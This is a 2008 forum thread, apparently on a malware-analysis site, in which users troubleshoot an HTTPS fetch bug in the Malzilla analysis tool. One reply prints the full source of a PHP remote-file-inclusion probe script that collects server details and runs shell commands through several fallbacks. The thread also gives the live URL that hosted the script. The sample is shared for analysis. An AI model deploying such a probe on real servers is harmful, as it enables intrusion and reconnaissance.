Author Topic: MalZilla  (Read 304269 times)

0 Members and 1 Guest are viewing this topic.

October 24, 2008, 07:19:36 pm
Reply #225

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hmmm... you just found another bug. It did work.... :(

October 25, 2008, 01:01:58 pm
Reply #226

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
httpS bug

Using malzilla i attempted to reterive, https://www.ba-sat.com/sunshop/images/products/idfeel.txt and it gave me a 500 responce, but i was able to grab the link using other means.

Code: [Select]
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();

Of course why anyone would use a https link for a RFI is another question  ::)
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 25, 2008, 01:10:17 pm
Reply #227

sowhat-x

  • Guest
...worked fine for me at the very exact moment?Using v1.1.0 obviously...

Code: [Select]
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1= @diskfreespace($pwd1);
$all1disk_total_space($pwd1);
$used = ConvertBytes($all1-$free1);
$free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free 0;}
$all ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all 0;}
if (@
is_writable($pwd1)) {$perm "[W]";} else {$perm "[R]";}
if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf "ON";} else {$sf "OFF";}

echo 
"FeeLCoMz".$sf."<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"srvip: $ip1<br>";
echo 
"srvname: $name1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all $perm<br>";

function 
ConvertBytes($number) {
  
$len strlen($number);
  if(
$len 4) { return sprintf("%d b"$number); }
  if(
$len >= && $len <=6) { return sprintf("%0.2f Kb"$number/1024); }
  if(
$len >= && $len <=9) { return sprintf("%0.2f Mb"$number/1024/1024); }
  return 
sprintf("%0.2f Gb"$number/1024/1024/1024);
}

function 
ex($cfe) {
  
$res '';
  if (!empty(
$cfe)) {
    if(
function_exists('exec')) {
      @
exec($cfe,$res);
      
$res join("\n",$res);
    } elseif(
function_exists('shell_exec')) {
      
$res = @shell_exec($cfe);
    } elseif(
function_exists('system')) {
      @
ob_start();
      @
system($cfe);
      
$res = @ob_get_contents();
      @
ob_end_clean();
    } elseif(
function_exists('passthru')) {
      @
ob_start();
      @
passthru($cfe);
      
$res = @ob_get_contents();
      @
ob_end_clean();
    } elseif(@
is_resource($f = @popen($cfe,"r"))) {
      
$res "";
      while(!@
feof($f)) { $res .= @fread($f,1024); }
      @
pclose($f);
    } else { 
$res "NULL"; }
  }
  return 
$res;
}

exit;

?>

PS:That's what happens to people that prefer using Vista instead of XP... ;-)

October 25, 2008, 02:03:50 pm
Reply #228

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Since reading Sow`s post, ive reinstalled V1.1.0 and it still gives me a 500 responce on that link, strange.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 25, 2008, 02:41:23 pm
Reply #229

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Works fine here. Either geolocation or you are banned from the server (or your proxy is banned if you are using one).

October 25, 2008, 02:58:07 pm
Reply #230

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
https://www.ba-sat.com/sunshop/images/products/idfeel.txt

Quote
GET /sunshop/images/products/idfeel.txt HTTP/1.0
Host: www.ba-sat.com:443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept-Encoding: gzip

Works fine in my browser.

October 25, 2008, 06:18:00 pm
Reply #231

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I get the best results when downloading from Ireland mirror (can't recall the name).

Tis HEANet ;)

@John,
I get the same error for that one, and it works fine in the browser and in vURL DE;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

October 25, 2008, 06:48:29 pm
Reply #232

sowhat-x

  • Guest
I was talking with Orac about it earlier on irc...we didn't manage to come up with a solution.
It's not dns cache (ipconfig /flushdns),that's for sure.
It's not firewall rules,again,that's for sure.
Then again,the error code returned is 500...which is kinda weird:
because if we assume the fault is not in the server configuration itself,
then the only thing that comes to mind is that the packets,
don't get transmitted correctly from the client itself...thereby triggering that error.

bobby says "either geolocation or you are banned from the server",
which pretty much seems to be the most reasonable explanation to me.
If not,then...not many things come to mind on how to solve this,anyway...

1)Capture two different pcap files in order to compare what's being going on...
one via whatever browser that responds 200 ok,one via Malzilla that returns 500.
2)Trace what Malzilla does when the annoying 500 returns,either via OllyDbg,
or even via a "simpler" api tracer out there...here's a small example list:
http://www.teamfurry.com/index.php?topic=10.msg21#msg21
3)Maybe the server itself doesn't implement ssl correctly?
Here's all the ssl algos that this server supposedly implements/understands...

October 25, 2008, 08:12:39 pm
Reply #233

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Quote
"either geolocation or you are banned from the server"

Cant be either of those as i can get the link using a browser.

Pcap logs show a zero byte TCP stream when using malzilla, the TCP stream is complety normal when using a broswer.

I tried using malzilla with the same UA as my browser, that didnt make any differnce either.

I think its either something in the server, or the https request from malzilla isnt being accepted for some reason.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 25, 2008, 08:37:10 pm
Reply #234

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I've found some reports that OpenSSL library is not working properly on WinXP SP3, so this bug maybe affects Vista too.
Malzilla is using OpenSSL library to manage HTTPS protocol (libeay32.dll in Malzilla's folder).
Version supplied with Malzilla is 0.9.8.7 (0.9.8g)
If you find a newer version, please replace the old dll.
You may try to get the files from here (extract them from the installer):
http://www.slproweb.com/products/Win32OpenSSL.html

October 25, 2008, 11:21:13 pm
Reply #235

sowhat-x

  • Guest
Quote
Pcap logs show a zero byte TCP stream when using malzilla
...if Wireshark doesn't report much stuff regarding the ssl handshake/algo negotiation in question,
there are couple of alternatives I can think of...or actually,
it's one alternative option,that is to use an ssl 'debugging' proxy instead...
with ssldump as the first one that comes to mind.
Note though that I've never tried to build ssldump under win32...  :-\
http://www.rtfm.com/ssldump/

What I've been in the need of compiling and have used successfully under win32 in the past,
is couple of simpler ssl diagnostic proxy implementations...Mozilla's own ssltap namely:
http://www.mozilla.org/projects/security/pki/nss/tools/ssltap.html
And sshole as well (it had built cleanly under cygwin)...
http://thekonst.net/en/sshole

October 26, 2008, 03:27:42 pm
Reply #236

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Found the answer from bobbys link
Quote
If you discover 0.9.8i doesn't work (saying something like "The application did not start") and you are running XP SP3 and have installed the VC++ 2008 Redistributables, then revert to XP SP2 and make it a corporate policy to stop using the latest bleeding-edge software from Microsoft.

Guess what, this machine is XP SP3

:(
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 29, 2008, 10:48:17 pm
Reply #237

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Just an FYI Bobby, Malzilla is showing the following on initial launch? (loaded without issue after clicking OK)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

October 29, 2008, 11:44:17 pm
Reply #238

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Thats the part of OpenSSL. Malzilla uses this dll to handle https links.
Do you have another libeay32.dll in your path or just the one dll in Malzilla's folder?

October 29, 2008, 11:45:34 pm
Reply #239

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Just the one of them :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net